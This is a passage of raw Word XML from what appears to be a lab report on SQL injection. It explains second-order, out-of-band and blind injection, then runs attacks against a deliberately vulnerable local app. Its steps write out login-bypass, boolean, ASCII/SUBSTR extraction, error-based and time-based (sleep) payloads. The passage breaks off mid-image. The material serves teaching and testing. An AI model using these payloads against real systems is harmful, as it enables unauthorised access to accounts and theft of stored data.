      <w:r w:rsidRPr="00291358">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why this is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00291358">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>second-order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC42B82" w14:textId="77777777" w:rsidR="00291358" w:rsidRPr="00291358" w:rsidRDefault="00291358" w:rsidP="00291358">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00291358">
        <w:t>First order: attack works immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5E467" w14:textId="77777777" w:rsidR="00291358" w:rsidRPr="00291358" w:rsidRDefault="00291358" w:rsidP="00291358">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00291358">
        <w:t>Second order: attack is stored first, triggered later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57469DDA" w14:textId="0AFC6294" w:rsidR="00EF5EE7" w:rsidRPr="00A56427" w:rsidRDefault="00EF5EE7" w:rsidP="00EF5EE7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF5EE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Advanced Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE8063" w14:textId="77777777" w:rsidR="0096183E" w:rsidRDefault="0096183E" w:rsidP="0096183E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0096183E">
        <w:t>Advanced SQL injection attacks occur when attackers can inject SQL code but cannot easily see the results of their queries. As security awareness has improved, simple data-stealing methods have become less common, forcing attackers to use more complex techniques. Additionally, not all attackers aim to steal information; some focus on damaging systems. By injecting short but powerful commands, attackers can shut down databases or delete critical tables. This shows that SQL injection can be destructive, not just a data-theft risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B66438" w14:textId="0A6C2C0B" w:rsidR="00E37047" w:rsidRPr="00F6016E" w:rsidRDefault="00E37047" w:rsidP="00E37047">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37047">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Retrieving Data as Numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1E8AC" w14:textId="130730DB" w:rsidR="0096183E" w:rsidRPr="0096183E" w:rsidRDefault="00AD78BA" w:rsidP="0096183E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD78BA">
        <w:t>ven when text inputs are secure, numeric fields may still allow SQL injection. Attackers can extract hidden text by converting characters into ASCII numbers using database functions. By collecting and decoding numeric responses, large amounts of data can be reconstructed byte by byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F922F9" w14:textId="34BAA08E" w:rsidR="005C5603" w:rsidRPr="00F6016E" w:rsidRDefault="005C5603" w:rsidP="005C5603">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5603">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Using an Out-of-Band Channe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2693C1B7" w14:textId="282B9343" w:rsidR="005C0450" w:rsidRDefault="005C0450" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005C0450">
        <w:t>When SQL injection results are not shown on the screen, attackers can still extract data using out-of-band channels. These techniques force the database to send information over the network, such as through HTTP, DNS, files, or emails. Different databases provide different built-in features that attackers can abuse to leak data or escalate control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F92813" w14:textId="14105228" w:rsidR="00E27102" w:rsidRDefault="00E27102" w:rsidP="00E27102">
      <w:r w:rsidRPr="00E27102">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Using Inference: Conditional Responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5F0DC" w14:textId="512C726A" w:rsidR="00B33AF8" w:rsidRDefault="00E27102" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E27102">
        <w:t>When attackers cannot see query results or use network channels, they rely on inference techniques in blind SQL injection. By observing changes in application behavio</w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27102">
        <w:t>r, errors, or response time delays, they can determine whether injected conditions are true or false. Repeating these tests allows attackers to extract database information one bit or character at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A74C5F" w14:textId="77777777" w:rsidR="00C977EF" w:rsidRDefault="00C977EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E908CAB" w14:textId="64BECC0F" w:rsidR="0001091A" w:rsidRDefault="0001091A" w:rsidP="0001091A">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Observing advanced exploitation on the vulnerable local app</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C2BCC" w14:textId="275493A8" w:rsidR="0001091A" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Init_db.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E52FD" w14:textId="69DF88F5" w:rsidR="00C977EF" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C977EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F960F2C" wp14:editId="0E1240FD">
            <wp:extent cx="5731510" cy="3340735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12402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2854" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3340735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E86194" w14:textId="6C993F37" w:rsidR="00C977EF" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA75E57" w14:textId="6548E62C" w:rsidR="00C977EF" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C977EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38B3103C" wp14:editId="32D6FBDB">
            <wp:extent cx="5731510" cy="3068320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="211109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7721" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3068320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A34E0" w14:textId="57872F64" w:rsidR="00C977EF" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C977EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7831F96C" wp14:editId="13016CB7">
            <wp:extent cx="5731510" cy="3411855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="91472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7825" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3411855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C6A26" w14:textId="639D21DE" w:rsidR="00C977EF" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB9F474" w14:textId="76A4BB77" w:rsidR="00C977EF" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C977EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B8C123" wp14:editId="082D8B34">
            <wp:extent cx="5731510" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="174628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84001" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1435100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C4D25" w14:textId="6E198BA8" w:rsidR="00C977EF" w:rsidRDefault="00C977EF" w:rsidP="005C0450">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F36BE" w14:textId="736FF3AB" w:rsidR="00C977EF" w:rsidRDefault="00D2593E" w:rsidP="00D2593E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D2593E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28E3E1DB" wp14:editId="58E042EB">
            <wp:extent cx="3643745" cy="1752437"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="17059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75236" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3655895" cy="1758281"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB17CCA" w14:textId="77777777" w:rsidR="00882750" w:rsidRDefault="00882750">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6AA1A" w14:textId="5F22F22C" w:rsidR="00D2593E" w:rsidRDefault="00882750" w:rsidP="00AD58C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step1: Normal login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA34970" w14:textId="0DD7856C" w:rsidR="00882750" w:rsidRDefault="00882750" w:rsidP="00882750">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00882750">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20262D45" wp14:editId="5D42D858">
            <wp:extent cx="3226618" cy="928255"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="10254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0254" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId74"/>
                    <a:srcRect b="30356"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3242641" cy="932865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99E07A" w14:textId="33726F9B" w:rsidR="00882750" w:rsidRDefault="00A50496" w:rsidP="00882750">
      <w:r>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A50496">
        <w:t>Authentication Bypass (Logic Injection)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00282C40">
        <w:t xml:space="preserve">. Username: </w:t>
      </w:r>
      <w:r w:rsidR="00282C40" w:rsidRPr="00282C40">
        <w:t xml:space="preserve">admin' </w:t>
      </w:r>
      <w:r w:rsidR="00477367">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F4C8A1" w14:textId="22F38F31" w:rsidR="00282C40" w:rsidRDefault="00200D2D" w:rsidP="0014142C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00200D2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C91AF9" wp14:editId="14979035">
            <wp:extent cx="4080164" cy="1510737"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114886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68053" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4091864" cy="1515069"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D4D3E" w14:textId="607E6018" w:rsidR="00426481" w:rsidRDefault="00426481" w:rsidP="00426481">
      <w:r>
        <w:t>When clicked on ‘login’ button:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E107BD" w14:textId="59890E12" w:rsidR="00200D2D" w:rsidRDefault="00200D2D" w:rsidP="00200D2D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00200D2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EDA1DA" wp14:editId="130F5AB8">
            <wp:extent cx="4184073" cy="1273061"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
            <wp:docPr id="164250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7548" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4198573" cy="1277473"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104C5A1" w14:textId="75BEBEAD" w:rsidR="006F1661" w:rsidRDefault="006F1661" w:rsidP="006F1661">
      <w:r w:rsidRPr="006F1661">
        <w:t>Logs in → SQL injection confirmed</w:t>
      </w:r>
      <w:r w:rsidR="00CE1763">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4361EE63" w14:textId="513D2BBC" w:rsidR="00CE1763" w:rsidRDefault="00CE1763" w:rsidP="006F1661">
      <w:r>
        <w:t xml:space="preserve">Step3: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1763">
        <w:t>Conditional / Blind Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1763">
        <w:t>Test TRUE condition:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1763">
        <w:t xml:space="preserve">admin' AND 1=1 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27121E2F" w14:textId="11F0E11B" w:rsidR="00CE1763" w:rsidRDefault="00CE1763" w:rsidP="00CE1763">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE1763">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60F876BD" wp14:editId="36F017C3">
            <wp:extent cx="4686954" cy="1267002"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="592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256" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686954" cy="1267002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188DC780" w14:textId="49DD88BD" w:rsidR="007306CA" w:rsidRDefault="007306CA" w:rsidP="007306CA">
      <w:r w:rsidRPr="007306CA">
        <w:t>Test FALSE condition:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007306CA">
        <w:t xml:space="preserve">admin' AND 1=2 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDBBAC" w14:textId="70C696FD" w:rsidR="007306CA" w:rsidRDefault="007306CA" w:rsidP="007306CA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007306CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D9B51F0" wp14:editId="1AA31891">
            <wp:extent cx="4372585" cy="1343212"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="20454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09516" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4372585" cy="1343212"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D9A0A" w14:textId="7B9EC331" w:rsidR="007306CA" w:rsidRDefault="007306CA" w:rsidP="007306CA">
      <w:r w:rsidRPr="007306CA">
        <w:t>Response changes → you control logic</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C91B9E" w14:textId="77777777" w:rsidR="0093575B" w:rsidRPr="0093575B" w:rsidRDefault="00160A4B" w:rsidP="0093575B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step4: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00160A4B">
        <w:t>Extract Data Using Inference (ASCII + SUBSTR)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0093575B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0093575B" w:rsidRPr="0093575B">
        <w:t>Test first letter of username:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35807F" w14:textId="77777777" w:rsidR="0093575B" w:rsidRPr="0093575B" w:rsidRDefault="0093575B" w:rsidP="0093575B">
      <w:r w:rsidRPr="0093575B">
        <w:t>admin' AND ASCII(SUBSTR(username,1,1))=97 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144AAA7C" w14:textId="607DD4A9" w:rsidR="0093575B" w:rsidRDefault="0093575B" w:rsidP="0093575B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0093575B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="565442B1" wp14:editId="798F6CB8">
            <wp:extent cx="5725324" cy="1505160"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="45179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6655" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5725324" cy="1505160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05803158" w14:textId="77777777" w:rsidR="00BB5D74" w:rsidRPr="00BB5D74" w:rsidRDefault="00BB5D74" w:rsidP="00BB5D74">
      <w:r>
        <w:t xml:space="preserve">Step5: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5D74">
        <w:t>Error-Based Inference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5D74">
        <w:t>Trigger error conditionally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1ABF3" w14:textId="77777777" w:rsidR="00BB5D74" w:rsidRPr="00BB5D74" w:rsidRDefault="00BB5D74" w:rsidP="00BB5D74">
      <w:r w:rsidRPr="00BB5D74">
        <w:t>admin' AND (CASE WHEN (1=1) THEN 1/0 ELSE 1 END) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA97BA9" w14:textId="05298805" w:rsidR="00BB5D74" w:rsidRDefault="00BB5D74" w:rsidP="00BB5D74">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB5D74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2553D261" wp14:editId="1BBA8D4F">
            <wp:extent cx="4086795" cy="1305107"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14165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2319" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4086795" cy="1305107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="624CD96E" w14:textId="77777777" w:rsidR="00E03E7C" w:rsidRPr="00E03E7C" w:rsidRDefault="00BB5D74" w:rsidP="00E03E7C">
      <w:r>
        <w:t xml:space="preserve">Step6: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5D74">
        <w:t>Time-Based Blind Injection</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E03E7C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E03E7C" w:rsidRPr="00E03E7C">
        <w:t>Delay login if condition is true:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E4254" w14:textId="77777777" w:rsidR="00E03E7C" w:rsidRPr="00E03E7C" w:rsidRDefault="00E03E7C" w:rsidP="00E03E7C">
      <w:r w:rsidRPr="00E03E7C">
        <w:t>admin' AND sleep(5) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7AD3EF" w14:textId="2F5A93CA" w:rsidR="00BB5D74" w:rsidRDefault="00E03E7C" w:rsidP="00BB5D74">
      <w:r w:rsidRPr="00E03E7C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E47031" wp14:editId="51CB3D48">
            <wp:extent cx="5731510" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
